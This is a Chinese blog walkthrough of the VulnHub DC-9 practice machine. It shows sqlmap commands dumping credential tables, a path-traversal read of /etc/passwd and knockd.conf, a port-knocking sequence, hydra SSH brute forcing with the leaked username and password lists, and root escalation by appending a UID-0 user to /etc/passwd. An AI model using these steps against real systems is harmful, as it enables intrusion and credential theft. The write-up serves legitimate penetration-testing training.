【vulnhub】DC9

最新推荐文章于 2023-03-24 15:28:34 发布
最新推荐文章于 2023-03-24 15:28:34 发布
阅读量635 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/125808641
版权

📒博客主页:开心星人的博客主页
🔥系列专栏:vulnhub
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年7月15日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

靶机为桥接模式,设置kali为桥接模式

主机发现arp-scan -l
在这里插入图片描述
端口扫描nmap -p- -sV 192.168.1.104
在这里插入图片描述
80端口开放,22端口filtered(端口状态filtered:端口状态filtered由于报文无法到达指定的端口,nmap不能够决定端口的开放状态。)

访问80端口
在这里插入图片描述
用户信息页面

在这里插入图片描述
搜索页面

在这里插入图片描述
后台管理界面

搜索页面提示我们使用姓或名进行搜索,我们用用户信息界面的第一个用户进行尝试
搜索Mary
在这里插入图片描述
判断是否存在注入
Mary' and 1=1# 能查出来
Mary' and 1=2# 不能查出来

所以存在SQL注入漏洞

因为是POST传参的,所以我们想用bp抓个包,保存为1.txt,然后使用sqlmap的-r参数即可

这里使用另一种方法
在这里插入图片描述
用浏览器自带的抓包,查看参数的名称为search,并且在result.php
使用sqlmap的–data参数即可

sqlmap -u "http://192.168.1.104/results.php" --dbs --data "search=1" --batch //查数据库
在这里插入图片描述
sqlmap -u "http://192.168.1.104/results.php" -D users --tables --data "search=1" --batch //查表
在这里插入图片描述

sqlmap -u "http://192.168.1.104/results.php" -D users -T UserDetails --columns --data "search=1" --batch //查字段
在这里插入图片描述
sqlmap -u "http://192.168.1.104/results.php" -D users -T UserDetails -C "id,username,password" --dump --data "search=1" --batch //导出数据
在这里插入图片描述
得到一些用户的账号的密码,貌似直接是明文

sqlmap -u "http://192.168.1.104/results.php" -D Staff --tables --data "search=1" --batch //查Staff数据库
在这里插入图片描述

sqlmap -u "http://192.168.1.104/results.php" -D Staff -T StaffDetails --columns --data "search=1" --batch //查字段

在这里插入图片描述
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T StaffDetails -C "id,username,password" --dump --data "search=1" --batch //查字段

在这里插入图片描述

看Users表
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T Users --columns --data "search=1" --batch //查字段
在这里插入图片描述
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T Users -C "Username,Password" --dump --data "search=1" --batch
在这里插入图片描述
admin用户

在这里插入图片描述
在这里插入图片描述

密码为transorbital1

在这里插入图片描述
登录后台

显示文件不存在,可能存在文件包含漏洞
http://192.168.1.104/manage.php?file=../../../../etc/passwd
在这里插入图片描述
看到这些用户名,有我们刚才脱裤得到的
所以考虑ssh
但是ssh状态为filtered,可能是被防火墙过滤了
http://192.168.1.104/manage.php?file=../../../../etc/knockd.conf
查看配置文件

在这里插入图片描述

/etc/knockd.conf里的配置会导致ssh连接被拒绝,它通过动态的添加iptables规则来隐藏系统开启的服务。

使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

依次访问7469、8475、9842端口

nmap -p 7469 192.168.1.104
nmap -p 8475 192.168.1.104
nmap -p 9842 192.168.1.104
nmap -p 22 10.10.10.135

在这里插入图片描述
开了

用得到的账号和密码,使用hydra进行爆破
users.txt

marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

pass.txt

3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

hydra -L users.txt -P pass.txt 192.168.1.104 ssh
在这里插入图片描述
得到了三个用户

[22][ssh] host: 192.168.1.104   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.104   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.104   login: janitor   password: Ilovepeepee

依次登录这三个用户,进行信息收集把
ssh chandlerb@192.168.1.104
ssh janitor@192.168.1.104

在janitor的加目录下发现一个字典,加入到我们的密码字典里面去,继续爆破ssh服务
在这里插入图片描述
在这里插入图片描述

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

更新一下pass.txt
再次用hydra爆破

在这里插入图片描述

多出一个用户

login:fredf   password:B4-Tru3-001

直接登录

进行提权
sudo -l
在这里插入图片描述
有一个test,不需要密码

进入test目录,并尝试执行
在这里插入图片描述
提示需要test.py

在目录/opt/devstuff中找到了test.py

在这里插入图片描述
将第一个文件的内容写入第二个文件中

所以我们可以重写/etc/passwd ,添加一个root用户

使用openssl生成一个hashopenssl passwd -1 -salt coder 123456
在这里插入图片描述
$1$coder$FFj87UJt/aBpDjcIMTCtR1

echo 'coder:$1$coder$FFj87UJt/aBpDjcIMTCtR1:0:0:root:/bin/bash' >> /tmp/DC9
sudo python ./test.py /tmp/DC9 /etc/passwd
su coder
在root家目录下找到flag

开心星人
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2003
vulnhub靶场渗透练习详解——DC9
记一次对DC9靶机完整的渗透测试
胖虎的博客
11-19 933
DC9靶机的渗透过程
DC-9靶机进行渗透测试
zll___的博客
03-24 432
DC-9靶机进行渗透测试
DC9_靶机实战
JSH_CDX的博客
04-02 1408
DC9靶机实战 本篇文章主要是记录如何通关DC9靶机,参考了其他人的通关过程,详细记录,旨在帮助他人解决问题
vulnhub DC系列 DC-9
m0_64815693的博客
12-29 1921
vulnhub DC系列 DC-9
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2807
Vulnhub靶机渗透学习——DC-9
vulnhubDC9
qq_54030686的博客
06-24 1050
vulnhubDC9这应该是DC系列的最后一篇,相较于其他靶机而言,会比较难一些,提权的方式也较为多样,本文参考 下面的是官方出的wp,上面为一位师傅写的,简述一些流程主机发现,端口扫描 主机开放了22和80端口,但是22端口为过滤状态,无法进行暴力破解 对80端口开放的服务进行指纹识别,这里使用whatweb,棱洞之类也可以 并未识别到网站使用的框架,只能够自己进行检测,这里使用burp和xray联合进行检测,具体操作方法这里不再进行描述, 经过检测,发现result.php界面存在sql注入,但是
Vulnhub DC-9
Pai_Space
04-11 3072
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 889
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Aluxian_的博客
04-19 5728
Vulnhub靶机DC9渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件包含:④:端口敲门: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://dow
VulnhubDC9
大方子
01-16 5373
靶机下载地址:http://www.five86.com/downloads/DC-9.zip 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.168.56.1/24 用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112 可以看到DC开放了80端口以及22端口(被过滤) nmap -sC -sV -oA dc-9 192.168.56
Vulnhub靶机:DC-9渗透详细过程(DC系列完结)
IerkeU的博客
03-28 3636
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
22/tcp open|filtered ssh 80/tcp open|filtered http
weixin_30399871的博客
11-18 1206
22/tcp open|filtered ssh80/tcp open|filtered http nmap不能确定该端口是打开还是过滤,这可能是扫描一个打开的端口,但没有回应。 转载于:https://www.cnblogs.com/seasonsstory/p/3429805.html...
基于SSM+JSP的企业人事管理信息系统毕业设计(源码+录像+说明).rar
最新发布
05-09
基于SSM+JSP的企业人事管理信息系统毕业设计(源码+录像+说明).rar 【项目技术】 开发语言:Java 框架:ssm+jsp 架构:B/S 数据库:mysql 【演示视频-编号:420】 https://pan.quark.cn/s/b3a97032fae7 【实现功能】 实现了员工基础数据的管理,考勤管理,福利管理,薪资管理,奖惩管理,考核管理,培训管理,招聘管理,公告管理,基础数据管理等功能。
dc/dc 100a
09-25
DC/DC 100A是一种直流至直流转换器,其最大输出电流为100安培。直流至直流转换器是一种电子装置,用于将输入的直流电压转换为不同的输出直流电压,同时保持输出电流的稳定性。 DC/DC 100A通常用于许多电子设备中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值